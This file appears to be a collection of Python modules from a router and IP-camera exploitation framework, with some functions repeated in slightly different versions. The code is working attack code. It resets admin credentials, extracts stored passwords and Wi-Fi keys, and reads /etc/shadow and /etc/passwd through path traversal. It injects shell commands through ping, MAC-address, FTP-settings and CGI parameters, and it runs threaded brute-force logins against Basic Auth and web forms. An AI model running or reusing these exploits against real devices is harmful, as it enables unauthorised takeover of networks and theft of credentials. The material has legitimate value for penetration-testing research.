def check(self): url = sanitize_url("{}:{}/".format(self.target, self.port)) response = http_request(method="GET", url=url) if response is None: return False # target is not vulnerable # unauthorized if response.status_code == 401: url = sanitize_url("{}:{}/BRS_netgear_success.html".format( self.target, self.port)) for _ in range(0, 3): response = http_request(method="GET", url=url) if response is None: return False # target is not vulnerable url = sanitize_url("{}:{}/".format(self.target, self.port)) response = http_request(method="GET", url=url) if response is None: return False # target is not vulnerable # authorized if response.status_code == 200: return True # target is vulnerable return False # target not vulnerable
def check(self): url = sanitize_url("{}:{}/".format(self.target, self.port)) response = http_request(method="GET", url=url) if response is None: return False # target is not vulnerable # unauthorized if response.status_code == 401: url = sanitize_url("{}:{}/BRS_netgear_success.html".format(self.target, self.port)) for _ in range(0, 3): response = http_request(method="GET", url=url) if response is None: return False # target is not vulnerable url = sanitize_url("{}:{}/".format(self.target, self.port)) response = http_request(method="GET", url=url) if response is None: return False # target is not vulnerable # authorized if response.status_code == 200: return True # target is vulnerable return False # target not vulnerable
def run(self): if self.check(): print_success("Target is vulnerable") print_status("Changing", self.target, "credentials to", self.nuser, ":", self.npass) url = sanitize_url("{}:{}/goform/RgSecurity".format(self.target, self.port)) headers = {u'Content-Type': u'application/x-www-form-urlencoded'} data = {"HttpUserId": self.nuser, "Password": self.npass, "PasswordReEnter": self.npass, "RestoreFactoryNo": "0x00"} response = http_request(method="POST", url=url, headers=headers, data=data) if response is None: print_error("Target did not answer request.") elif response.status_code == 401: # Server obeys request but then sends unauthorized response. Here we send a GET request with the new creds. infotab_url = sanitize_url("{}:{}/RgSwInfo.asp".format(self.target, self.port)) check_response = http_request(method="GET", url=infotab_url, auth=(self.nuser, self.npass)) if check_response.status_code == 200: print_success("Credentials changed!") elif response.status_code == 401: print_error("Target answered, denied access.") else: pass else: print_error("Unknown error.") else: print_error("Exploit failed - Target seems to be not vulnerable")
def check(self): # check if it is valid target url = sanitize_url("{}:{}/".format(self.target, self.port)) try: r = requests.get(url, verify=False) res = r.text except: return None if '<form name="pagepost" method="post" action="/xslt?PAGE=WRA01_POST&NEXTPAGE=WRA01_POST" id="pagepost">' not in res: return False # checking if authentication can be baypassed url = sanitize_url("{}:{}/xslt".format(self.target, self.port)) try: r = requests.get(url, verify=False) res = r.text except: return None if '<form name="pagepost" method="post" action="/xslt?PAGE=WRA01_POST&NEXTPAGE=WRA01_POST" id="pagepost">' not in res: return True # target vulnerable return False # target not vulnerable
def run(self): creds = [] url = sanitize_url("{}:{}/password.cgi".format(self.target, self.port)) # print_status("Requesting for {}".format(url)) response = http_request(method="GET", url=url) if response is None: return admin = re.findall("pwdAdmin = '(.+?)'", response.text) if admin: creds.append(('admin', admin[0])) support = re.findall("pwdSupport = '(.+?)'", response.text) if support: creds.append(('support', support[0])) user = re.findall("pwdUser = '******'", response.text) if user: creds.append(('user', user[0])) if creds: print_success("Credentials found!") print_table(("Login", "Password"), *creds) else: print_error("Credentials could not be found")
def attack(self): url = sanitize_url("{}:{}{}".format(self.target, self.port, self.path)) response = http_request("GET", url) if response is None: return if response.status_code != 401: print_status("Target is not protected by Basic Auth") return if self.defaults.startswith('file://'): defaults = open(self.defaults[7:], 'r') else: defaults = [self.defaults] collection = LockedIterator(defaults) self.run_threads(self.threads, self.target_function, collection) if self.credentials: print_success("Credentials found!") headers = ("Target", "Port", "Login", "Password") print_table(headers, *self.credentials) else: print_error("Credentials not found") defaults.close()
def run(self): url = sanitize_url("{}:{}/password.cgi".format(self.target, self.port)) print_status("Requesting for {}".format(url)) response = http_request(method="GET", url=url) if response is None: return creds = [] admin = re.findall("pwdAdmin = '(.+?)'", response.text) if len(admin): creds.append(('Admin', b64decode(admin[0]))) support = re.findall("pwdSupport = '(.+?)'", response.text) if len(support): creds.append(('Support', b64decode(support[0]))) user = re.findall("pwdUser = '******'", response.text) if len(user): creds.append(('User', b64decode(user[0]))) if len(creds): print_success("Credentials found!") headers = ("Login", "Password") print_table(headers, *creds) print("NOTE: Admin is commonly implemented as root") else: print_error("Credentials could not be found")
def run(self): # address and parameters url = sanitize_url("{}:{}/getcfg.php".format(self.target, self.port)) data = {"SERVICES": "DEVICE.ACCOUNT"} # connection try: r = requests.post(url, data=data) res = r.text except (requests.exceptions.MissingSchema, requests.exceptions.InvalidSchema): print_error("Invalid URL format: %s" % url) return except requests.exceptions.ConnectionError: print_error("Connection error: %s" % url) return # extracting credentials regular = "<name>(.+?)</name><usrid>(|.+?)</usrid><password>(|.+?)</password>" creds = re.findall(regular, re.sub('\s+', '', res)) # displaying results if len(creds): print_success("Credentials found!") headers = ('Username', 'Password') creds = tuple(tuple([item[0], item[2]]) for item in creds) print_table(headers, *creds) else: print_error("Credentials could not be found")
def run(self): url = sanitize_url("{}:{}/SaveCfgFile.cgi".format(self.target, self.port)) response = http_request(method="GET", url=url) if response is None: return var = ['pppoe_username', 'pppoe_password', 'wl0_pskkey', 'wl0_key1', 'mradius_password', 'mradius_secret', 'httpd_password', 'http_passwd', 'pppoe_passwd'] data = [] for v in var: regexp = '{}="(.+?)"'.format(v) val = re.findall(regexp, response.text) if len(val): data.append((v, val[0])) if len(data): print_success("Exploit success") headers = ("Option", "Value") print_table(headers, *data) else: print_error("Exploit failed")
def run(self): if self.check(): print_success("Target is vulnerable") print_status("Changing", self.target, "credentials to", self.nuser, ":", self.npass) url = sanitize_url("{}:{}/goform/RgSecurity".format( self.target, self.port)) headers = {u'Content-Type': u'application/x-www-form-urlencoded'} data = { "HttpUserId": self.nuser, "Password": self.npass, "PasswordReEnter": self.npass, "RestoreFactoryNo": "0x00" } response = http_request(method="POST", url=url, headers=headers, data=data) if response is None: print_error("Target did not answer request") elif response.status_code == 401: print_error("Target answered, denied access.") else: print_success("Credentials changed") else: print_error("Exploit failed - Target seems to be not vulnerable")
def target_function(self, running, data): module_verbosity = boolify(self.verbosity) name = threading.current_thread().name url = sanitize_url("{}:{}{}".format(self.target, self.port, self.path)) print_status(name, 'process is starting...', verbose=module_verbosity) while running.is_set(): try: user, password = data.next() user = user.encode('utf-8').strip() password = password.encode('utf-8').strip() r = requests.get(url, auth=(user, password), verify=False) if r.status_code != 401: running.clear() print_success("{}: Authentication succeed!".format(name), user, password, verbose=module_verbosity) self.credentials.append((user, password)) else: print_error( name, "Authentication Failed - Username: '******' Password: '******'" .format(user, password), verbose=module_verbosity) except StopIteration: break print_status(name, 'process is terminated.', verbose=module_verbosity)
def run(self): self.credentials = [] url = sanitize_url("{}:{}{}".format(self.target, self.port, self.path)) try: r = requests.get(url, verify=False) except (requests.exceptions.MissingSchema, requests.exceptions.InvalidSchema): print_error("Invalid URL format: %s" % url) return except requests.exceptions.ConnectionError: print_error("Connection error: %s" % url) return if r.status_code != 401: print_status("Target is not protected by Basic Auth") return if self.defaults.startswith('file://'): defaults = open(self.defaults[7:], 'r') else: defaults = [self.defaults] collection = LockedIterator(defaults) self.run_threads(self.threads, self.target_function, collection) if len(self.credentials): print_success("Credentials found!") headers = ("Login", "Password") print_table(headers, *self.credentials) else: print_error("Credentials not found")
def execute(self, cmd): url = sanitize_url("{}:{}/{}?writeData=true®info=0&macAddress= " "001122334455 -c 0 ;{}; echo #".format(self.target, self.port, self.valid_resource, cmd)) # blind command injection response = http_request(method="GET", url=url) return ""
def run(self): url = sanitize_url("{}:{}/hidden_info.html".format(self.target, self.port)) try: r = requests.get(url) res = r.text except (requests.exceptions.MissingSchema, requests.exceptions.InvalidSchema): print_error("Invalid URL format: %s" % url) return except requests.exceptions.ConnectionError: print_error("Connection error: %s" % url) return creds = [] data = ['2.4G SSID', '2.4G PassPhrase', '5G SSID', '5G PassPhrase', 'PIN Code'] for d in data: regexp = "<td nowrap><B>{}:</B></td>\r\n\t\t\t<td>(.+?)</td>".format(d) val = re.findall(regexp, res) if len(val): creds.append((d, val[0])) if len(creds): print_success("Credentials found!") headers = ("Option", "Value") print_table(headers, *creds) else: print_error("Credentials could not be found")
def run(self): url = sanitize_url("{}:{}/SaveCfgFile.cgi".format( self.target, self.port)) response = http_request(method="GET", url=url) if response is None: return var = [ 'pppoe_username', 'pppoe_password', 'wl0_pskkey', 'wl0_key1', 'mradius_password', 'mradius_secret', 'httpd_password', 'http_passwd', 'pppoe_passwd' ] data = [] for v in var: regexp = '{}="(.+?)"'.format(v) val = re.findall(regexp, response.text) if len(val): data.append((v, val[0])) if len(data): print_success("Exploit success") headers = ("Option", "Value") print_table(headers, *data) else: print_error("Exploit failed")
def run(self): url = sanitize_url( "{}:{}/cgi-bin/dget.cgi?cmd=wifi_AP1_ssid,wifi_AP1_hidden,wifi_AP1_passphrase,wifi_AP1_passphrase_wep,wifi_AP1_security_mode,wifi_AP1_enable,get_mac_filter_list,get_mac_filter_switch,get_client_list,get_mac_address,get_wps_dev_pin,get_wps_mode,get_wps_enable,get_wps_current_time&_=1458458152703" .format(self.target, self.port)) response = http_request(method="GET", url=url) if response is None: return try: print_status("Decoding JSON") data = json.loads(response.text) except ValueError: print_error("Exploit failed - response is not valid JSON") return if len(data): print_success("Exploit success") rows = [] for key in data.keys(): if len(data[key]) > 0: rows.append((key, data[key])) headers = ("Parameter", "Value") print_table(headers, *rows)
def target_function(self, running, data): module_verbosity = boolify(self.verbosity) name = threading.current_thread().name url = sanitize_url("{}:{}{}".format(self.target, self.port, self.path)) print_status(name, 'process is starting...', verbose=module_verbosity) while running.is_set(): try: user, password = data.next() user = user.encode('utf-8').strip() password = password.encode('utf-8').strip() response = http_request(method="GET", url=url, auth=(user, password)) if response.status_code != 401: if boolify(self.stop_on_success): running.clear() print_success("Target: {}:{} {}: Authentication Succeed - Username: '******' Password: '******'".format(self.target, self.port, name, user, password), verbose=module_verbosity) self.credentials.append((self.target, self.port, user, password)) else: print_error("Target: {}:{} {}: Authentication Failed - Username: '******' Password: '******'".format(self.target, self.port, name, user, password), verbose=module_verbosity) except StopIteration: break print_status(name, 'process is terminated.', verbose=module_verbosity)
def run(self): if self.check(): print_success("Target is vulnerable") url = sanitize_url("{}:{}".format(self.target, self.port)) print "Visit: {}/\n".format(url) else: print_error("Target seems to be not vulnerable")
def target_function(self, running, data): module_verbosity = boolify(self.verbosity) name = threading.current_thread().name url = sanitize_url("{}:{}{}".format(self.target, self.port, self.path)) headers = {u'Content-Type': u'application/x-www-form-urlencoded'} print_status(name, 'process is starting...', verbose=module_verbosity) while running.is_set(): try: line = data.next().split(":") user = line[0].strip() password = line[1].strip() postdata = self.data.replace("{{USER}}", user).replace("{{PASS}}", password) r = requests.post(url, headers=headers, data=postdata, verify=False) l = len(r.text) if l < self.invalid["min"] or l > self.invalid["max"]: if boolify(self.stop_on_success): running.clear() print_success("Target: {}:{} {}: Authentication Succeed - Username: '******' Password: '******'".format(self.target, self.port, name, user, password), verbose=module_verbosity) self.credentials.append((self.target, self.port, user, password)) else: print_error("Target: {}:{} {}: Authentication Failed - Username: '******' Password: '******'".format(self.target, self.port, name, user, password), verbose=module_verbosity) except StopIteration: break print_status(name, 'process is terminated.', verbose=module_verbosity)
def detect_form(self): url = sanitize_url("{}:{}{}".format(self.target, self.port, self.get_form_path())) r = requests.get(url, verify=False) soup = BeautifulSoup(r.text, "lxml") form = soup.find("form") if form is None: return None action = form.attrs.get('action', None) if len(form) > 0: res = [] for inp in form.findAll("input"): if 'name' in inp.attrs.keys(): if inp.attrs['name'].lower() in [ "username", "user", "login", "username_login" ]: res.append(inp.attrs['name'] + "=" + "{{USER}}") elif inp.attrs['name'].lower() in [ "password", "pass", "password_login" ]: res.append(inp.attrs['name'] + "=" + "{{PASS}}") else: if 'value' in inp.attrs.keys(): res.append(inp.attrs['name'] + "=" + inp.attrs['value']) else: res.append(inp.attrs['name'] + "=") return (action, '&'.join(res))
def check(self): # address and parameters url = sanitize_url("{}:{}/cgi-bin/webproc".format( self.target, self.port)) data = { "getpage": "html/index.html", "*errorpage*": "../../../../../../../../../../../etc/shadow", "var%3Amenu": "setup", "var%3Apage": "connected", "var%": "", "objaction": "auth", "%3Ausername": "******", "%3Apassword": "******", "%3Aaction": "login", "%3Asessionid": "abcdefgh" } # connection response = http_request(method="POST", url=url, data=data) if response is None: return False # target is not vulnerable if "root" in response.text: return True # target vulnerable return False # target not vulnerable
def run(self): url = sanitize_url("{}:{}/cgi-bin/dget.cgi?cmd=wifi_AP1_ssid,wifi_AP1_hidden,wifi_AP1_passphrase,wifi_AP1_passphrase_wep,wifi_AP1_security_mode,wifi_AP1_enable,get_mac_filter_list,get_mac_filter_switch,get_client_list,get_mac_address,get_wps_dev_pin,get_wps_mode,get_wps_enable,get_wps_current_time&_=1458458152703".format(self.target, self.port)) print_status("Running module...") try: r = requests.get(url) res = r.text except (requests.exceptions.MissingSchema, requests.exceptions.InvalidSchema): print_error("Invalid URL format: %s" % url) return except requests.exceptions.ConnectionError: print_error("Connection error: %s" % url) return try: data = json.loads(res) print_status("Decoding JSON value") except ValueError: print_error("Response is not valid JSON") return if len(data): print_success("Exploit success") rows = [] for key in data.keys(): if len(data[key]) > 0: rows.append((key, data[key])) headers = ("Parameter", "Value") print_table(headers, *rows)
def target_function(self, running, data): module_verbosity = boolify(self.verbosity) name = threading.current_thread().name url = sanitize_url("{}:{}{}".format(self.target, self.port, self.path)) print_status(name, 'process is starting...', verbose=module_verbosity) while running.is_set(): try: line = data.next().split(":") user = line[0].encode('utf-8').strip() password = line[1].encode('utf-8').strip() response = http_request(method="GET", url=url, auth=(user, password)) if response.status_code != 401: running.clear() print_success( "Target: {}:{} {}: Authentication Succeed - Username: '******' Password: '******'" .format(self.target, self.port, name, user, password), verbose=module_verbosity) self.credentials.append( (self.target, self.port, user, password)) else: print_error( "Target: {}:{} {}: Authentication Failed - Username: '******' Password: '******'" .format(self.target, self.port, name, user, password), verbose=module_verbosity) except StopIteration: break print_status(name, 'process is terminated.', verbose=module_verbosity)
def target_function(self, running, data): module_verbosity = boolify(self.verbosity) name = threading.current_thread().name url = sanitize_url("{}:{}{}".format(self.target, self.port, self.path)) headers = {u'Content-Type': u'application/x-www-form-urlencoded'} print_status(name, 'process is starting...', verbose=module_verbosity) while running.is_set(): try: line = data.next().split(":") user = line[0].strip() password = line[1].strip() postdata = self.data.replace("{{USER}}", user).replace("{{PASS}}", password) r = requests.post(url, headers=headers, data=postdata, verify=False) l = len(r.text) if l < self.invalid["min"] or l > self.invalid["max"]: running.clear() print_success("{}: Authentication succeed!".format(name), user, password, verbose=module_verbosity) self.credentials.append((user, password)) else: print_error(name, "Authentication Failed - Username: '******' Password: '******'".format(user, password), verbose=module_verbosity) except StopIteration: break print_status(name, 'process is terminated.', verbose=module_verbosity)
def check(self): number = int(random_text(6, alph=string.digits)) solution = number - 1 cmd = "echo $(({}-1))".format(number) marker = random_text(32) url = sanitize_url("{}:{}{}".format(self.target, self.port, self.path)) for payload in self.payloads: injection = payload.replace("{{marker}}", marker).replace("{{cmd}}", cmd) headers = { self.header: injection, } response = http_request(method=self.method, url=url, headers=headers) if response is None: continue if str(solution) in response.text: self.valid = payload return True # target is vulnerable return False # target not vulnerable
def check(self): url = sanitize_url("{}:{}/test".format(self.target, self.port)) user_agent = 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)' headers = { 'User-Agent': user_agent, 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-language': 'sk,cs;q=0.8,en-US;q=0.5,en;q,0.3', 'Connection': 'keep-alive', 'Accept-Encoding': 'gzip, deflate', 'Cache-Control': 'no-cache', 'Cookie': 'C107373883=/omg1337hax' } response = http_request(method="GET", url=url, headers=headers) if response is None: return False # target is not vulnerable if response.status_code != 404: return False # not rompage else: if 'server' in response.headers: server = response.headers.get('server') if re.search('RomPager', server) is not None: if re.search('omg1337hax', response.text) is not None: return True # device is vulnerable else: return None # could not verify return False # target is not vulnerable
def check(self): mark = random_text(32) cmd = "echo {}".format(mark) url = sanitize_url("{}:{}/apply.cgi".format(self.target, self.port)) data = { "submit_button": "Diagnostics", "change_action": "gozila_cgi", "submit_type": "start_ping", "action": "", "commit": "0", "ping_ip": "127.0.0.1", "ping_size": "&" + cmd, "ping_times": "5", "traceroute_ip": "127.0.0.1" } response = http_request(method="POST", url=url, data=data, auth=(self.username, self.password)) if response is None: return False # target is not vulnerable if mark in response.text: return True # target is vulnerable return False # target is not vulnerable
def run(self): url = sanitize_url("{}:{}/hidden_info.html".format( self.target, self.port)) response = http_request(method="GET", url=url) if response is None: return creds = [] data = [ '2.4G SSID', '2.4G PassPhrase', '5G SSID', '5G PassPhrase', 'PIN Code' ] for d in data: regexp = "<td nowrap><B>{}:</B></td>\r\n\t\t\t<td>(.+?)</td>".format( d) val = re.findall(regexp, response.text) if len(val): creds.append((d, val[0])) if len(creds): print_success("Credentials found!") headers = ("Option", "Value") print_table(headers, *creds) else: print_error("Credentials could not be found")
def check(self): url = sanitize_url("{}:{}/test".format(self.target, self.port)) user_agent = 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)' headers = {'User-Agent': user_agent, 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-language': 'sk,cs;q=0.8,en-US;q=0.5,en;q,0.3', 'Connection': 'keep-alive', 'Accept-Encoding': 'gzip, deflate', 'Cache-Control': 'no-cache', 'Cookie': 'C107373883=/omg1337hax'} response = http_request(method="GET", url=url, headers=headers) if response is None: return False # target is not vulnerable if response.status_code != 404: return False # not rompage else: if 'server' in response.headers: server = response.headers.get('server') if re.search('RomPager', server) is not None: if re.search('omg1337hax', response.text) is not None: return True # device is vulnerable else: return None # could not verify return False # target is not vulnerable
def attack(self): url = sanitize_url("{}:{}{}".format(self.target, self.port, self.path)) response = http_request(method="GET", url=url) if response is None: return if response.status_code != 401: print_status("Target is not protected by Basic Auth") return if self.usernames.startswith('file://'): usernames = open(self.usernames[7:], 'r') else: usernames = [self.usernames] if self.passwords.startswith('file://'): passwords = open(self.passwords[7:], 'r') else: passwords = [self.passwords] collection = LockedIterator(itertools.product(usernames, passwords)) self.run_threads(self.threads, self.target_function, collection) if len(self.credentials): print_success("Credentials found!") headers = ("Target", "Port", "Login", "Password") print_table(headers, *self.credentials) else: print_error("Credentials not found")
def check(self): url = sanitize_url("{}:{}/".format(self.target, self.port)) try: r = requests.get(url) except (requests.exceptions.MissingSchema, requests.exceptions.InvalidSchema, requests.exceptions.ConnectionError): return None # target could not be verified if r.status_code == requests.codes.unauthorized: url = sanitize_url("{}:{}/BRS_netgear_success.html".format(self.target, self.port)) r = requests.get(url) if r.status_code == requests.codes.ok: return True return False # target not vulnerable
def detect_form(self): url = sanitize_url("{}:{}{}".format(self.target, self.port, self.get_form_path())) r = requests.get(url, verify=False) soup = BeautifulSoup(r.text, "lxml") forms = soup.findAll("form") if forms is None: return None res = [] action = None user_name_list = [ "username", "user", "user_name", "login", "username_login", "nameinput", "uname", "__auth_user", "txt_user", "txtusername" ] password_list = [ "password", "pass", "password_login", "pwd", "passwd", "__auth_pass", "txt_pwd", "txtpwd" ] found = False for form in forms: tmp = [] if not len(form): continue action = form.attrs.get('action', None) if action and not action.startswith("/"): action = "/" + action for inp in form.findAll("input"): attributes = ["name", "id"] for atr in attributes: if atr not in inp.attrs.keys(): continue if inp.attrs[atr].lower( ) in user_name_list and inp.attrs['type'] != "hidden": found = True tmp.append(inp.attrs[atr] + "=" + "{{USER}}") elif inp.attrs[atr].lower( ) in password_list and inp.attrs['type'] != "hidden": found = True tmp.append(inp.attrs[atr] + "=" + "{{PASS}}") else: if 'value' in inp.attrs.keys(): tmp.append(inp.attrs[atr] + "=" + inp.attrs['value']) elif inp.attrs['type'] not in ("submit", "button"): tmp.append(inp.attrs[atr] + "=") if found: res = tmp res = list(set(res)) return (action, '&'.join(res))
def run(self): url = sanitize_url("{}:{}/SaveCfgFile.cgi".format(self.target, self.port)) try: r = requests.get(url, verify=False) res = r.text except requests.exceptions.ConnectionError: print_error("Connection error: %s" % url) return var = ['pppoe_username', 'pppoe_password', 'wl0_pskkey', 'wl0_key1', 'mradius_password', 'mradius_secret', 'httpd_password', 'http_passwd', 'pppoe_passwd'] data = [] for v in var: regexp = '{}="(.+?)"'.format(v) val = re.findall(regexp, res) if len(val): data.append((v, val[0])) if len(data): print_success("Exploit success") headers = ("Option", "Value") print_table(headers, *data) else: print_error("Exploit failed")
def run(self): print_status("Running module...") self.credentials = [] url = sanitize_url("{}:{}".format(self.target, self.port)) try: r = requests.get(url) except (requests.exceptions.MissingSchema, requests.exceptions.InvalidSchema): print_error("Invalid URL format: %s" % url) return except requests.exceptions.ConnectionError: print_error("Connection error: %s" % url) return if r.status_code != 401: print_status("Target is not protected by Basic Auth") return if self.defaults.startswith('file://'): defaults = open(self.defaults[7:], 'r') else: defaults = [self.defaults] collection = LockedIterator(defaults) self.run_threads(self.threads, self.target_function, collection) if len(self.credentials): print_success("Credentials found!") headers = ("Login", "Password") print_table(headers, *self.credentials) else: print_error("Credentials not found")
def detect_form(self): url = sanitize_url("{}:{}{}".format(self.target, self.port, self.get_form_path())) r = requests.get(url, verify=False) soup = BeautifulSoup(r.text, "lxml") form = soup.find("form") if form is None: return None action = form.attrs.get('action', None) if len(form) > 0: res = [] for inp in form.findAll("input"): if 'name' in inp.attrs.keys(): if inp.attrs['name'].lower() in ["username", "user", "login", "username_login"]: res.append(inp.attrs['name'] + "=" + "{{USER}}") elif inp.attrs['name'].lower() in ["password", "pass", "password_login"]: res.append(inp.attrs['name'] + "=" + "{{PASS}}") else: if 'value' in inp.attrs.keys(): res.append(inp.attrs['name'] + "=" + inp.attrs['value']) else: res.append(inp.attrs['name'] + "=") return (action, '&'.join(res))
def run(self): if self.check(): url = sanitize_url("{}:{}/password.cgi".format(self.target, self.port)) print_status("Requesting for {}".format(url)) response = http_request(method="GET", url=url) if response is None: return regexps = [("admin", "pwdAdmin = '(.+?)'"), ("support", "pwdSupport = '(.+?)'"), ("user", "pwdUser = '******'")] creds = [] for regexp in regexps: res = re.findall(regexp[1], response.text) if len(res): creds.append((regexp[0], b64decode(res[0]))) if len(creds): print_success("Credentials found!") headers = ("Login", "Password") print_table(headers, *creds) print("NOTE: Admin is commonly implemented as root") else: print_error("Credentials could not be found") else: print_error("Device seems to be not vulnerable")
def execute(self, cmd): url = sanitize_url("{}:{}/cgi-bin/script?system%20{}".format(self.target, self.port, cmd)) response = http_request(method="GET", url=url) if response is None: return "" return response.text
def check(self): url = sanitize_url("{}:{}/logo.jpg".format(self.target, self.port)) response = http_request(method="GET", url=url, auth=("", "")) # print response.text.encode('utf-8') if response is not None and self.vulnresp in response.text.encode('utf-8'): return True else: return False
def execute(self, cmd): # Get credentials print_status("Extracting credentials") credential_url = sanitize_url( "{}:{}/system.ini?loginuse&loginpas".format( self.target, self.port)) response = http_request(method="GET", url=credential_url) # Find the magic sequence "0000 0a0a 0a0a 01" magic_sequence_location = response.content.find( b'\x00\x00\x0a\x0a\x0a\x0a\x01') # Skip ahead by 144 bytes to the beginning of username username_location = magic_sequence_location + 144 # Read every byte in a loop until the first '\x00' # THIS WILL NOT WORK UNDER PYTHON 3 (bytearrays return ints in py3)! username_bytes = bytearray() next_username_byte = bytes() index = username_location while next_username_byte != b'\x00': username_bytes.append(response.content[index]) next_username_byte = response.content[index + 1] index = index + 1 username = username_bytes.decode('utf-8') print_info("Username: "******"Password: "******"{}:{}/set_ftp.cgi?next_url=ftp.htm&loginuse={}&loginpas={}&svr=192.168.1.1&port=21&user=ftp&pwd=$({})&dir=/&mode=PORT&upload_interval=0".format( self.target, self.port, username, password, cmd) http_request(method="GET", url=command_url) # Run command run_url = "{}:{}/ftptest.cgi?next_url=test_ftp.htm&loginuse={}&loginpas={}".format( self.target, self.port, username, password) http_request(method="GET", url=run_url) time.sleep(2) return ""
def check(self): url = sanitize_url("{}:{}/system.ini?loginuse&loginpas".format(self.target, self.port)) response = http_request(method="GET", url=url) if response is None: return False if response.status_code == 200 and b'\x00\x00\x0a\x0a\x0a\x0a\x01' in response.content: return True else: return False
def check(self): url = sanitize_url("{}:{}/logo.jpg".format(self.target, self.port)) response = http_request(method="GET", url=url, auth=("", "")) # print response.text.encode('utf-8') if response is not None and self.vulnresp in response.text.encode( 'utf-8'): return True else: return False
def execute(self, cmd): url = sanitize_url("{}:{}/login.cgi.php".format(self.target, self.port)) headers = {u'Content-Type': u'application/x-www-form-urlencoded'} data = "GO=&jump=" + "A" * 1379 + ";{};&ps=\n\n".format(cmd) response = http_request(method="POST", url=url, headers=headers, data=data) if response is None: return "" return response.text
def execute(self, cmd): url = sanitize_url("{}:{}/command.php".format(self.target, self.port)) headers = {u'Content-Type': u'application/x-www-form-urlencoded'} data = "cmd={}".format(cmd) response = http_request(method="POST", url=url, headers=headers, data=data) if response is None: return "" return response.text.strip()
def check(self): url = sanitize_url("{}:{}/password.cgi".format(self.target, self.port)) response = http_request(method="GET", url=url) if response is None: return False # target is not vulnerable if any(map(lambda x: x in response.text, ["pwdSupport", "pwdUser", "pwdAdmin"])): return True # target vulnerable return False # target not vulnerable
def execute(self, cmd): url = sanitize_url("{}:{}/cgi-bin/script?system%20{}".format(self.target, self.port, cmd)) try: r = requests.get(url) except requests.exceptions.MissingSchema: return "Invalid URL format: %s" % url except requests.exceptions.ConnectionError: return "Connection error: %s" % url return r.text
def check(self): url = sanitize_url("{}:{}/cgi-bin/webproc?getpage=/etc/passwd&var:page=deviceinfo".format(self.target, self.port)) response = http_request(method="GET", url=url) if response is None: return False # target is not vulnerable if "root:" in response.text: return True # target vulnerable return False # target is not vulnerable
def check(self): url = sanitize_url("{}:{}/hidden_info.html".format(self.target, self.port)) response = http_request(method="GET", url=url) if response is None: return False # target is not vulnerable if any(map(lambda x: x in response.text, ["SSID", "PassPhrase"])): return True # target is vulnerable return False # target is not vulnerable
def execute(self, cmd): url = sanitize_url("{}:{}/{}?writeData=true®info=0&macAddress= 001122334455 -c 0 ;{}; echo #".format(self.target, self.port, self.valid_resource, cmd)) try: r = requests.get(url) except requests.exceptions.MissingSchema: return "Invalid URL format: %s" % url except requests.exceptions.ConnectionError: return "Connection error: %s" % url return ""
def check(self): url = sanitize_url("{}:{}/hidden_info.html".format( self.target, self.port)) response = http_request(method="GET", url=url) if response is None: return False # target is not vulnerable if any(map(lambda x: x in response.text, ["SSID", "PassPhrase"])): return True # target is vulnerable return False # target is not vulnerable
def check(self): url = sanitize_url("{}:{}/goform/system/GatewaySettings.bin".format( self.target, self.port)) response = http_request(method="GET", url=url) if response is None: return False # target is not vulnerable if response.status_code == 200 and "0Mlog" in response.text: return True # target is vulnerable else: return False # target is not vulnerable
def attack(self): url = sanitize_url("{}:{}{}".format(self.target, self.port, self.get_form_path())) try: requests.get(url, verify=False) except (requests.exceptions.MissingSchema, requests.exceptions.InvalidSchema): print_error("Invalid URL format: %s" % url) return except requests.exceptions.ConnectionError: print_error("Connection error: %s" % url) return # authentication type if self.form == 'auto': form_data = self.detect_form() if form_data is None: print_error("Could not detect form") return (form_action, self.data) = form_data if form_action: self.path = form_action else: self.data = self.form print_status("Using following data: ", self.data) # invalid authentication self.invalid_auth() # running threads if self.usernames.startswith('file://'): usernames = open(self.usernames[7:], 'r') else: usernames = [self.usernames] if self.passwords.startswith('file://'): passwords = open(self.passwords[7:], 'r') else: passwords = [self.passwords] collection = LockedIterator(itertools.product(usernames, passwords)) self.run_threads(self.threads, self.target_function, collection) if len(self.credentials): print_success("Credentials found!") headers = ("Target", "Port", "Login", "Password") print_table(headers, *self.credentials) else: print_error("Credentials not found")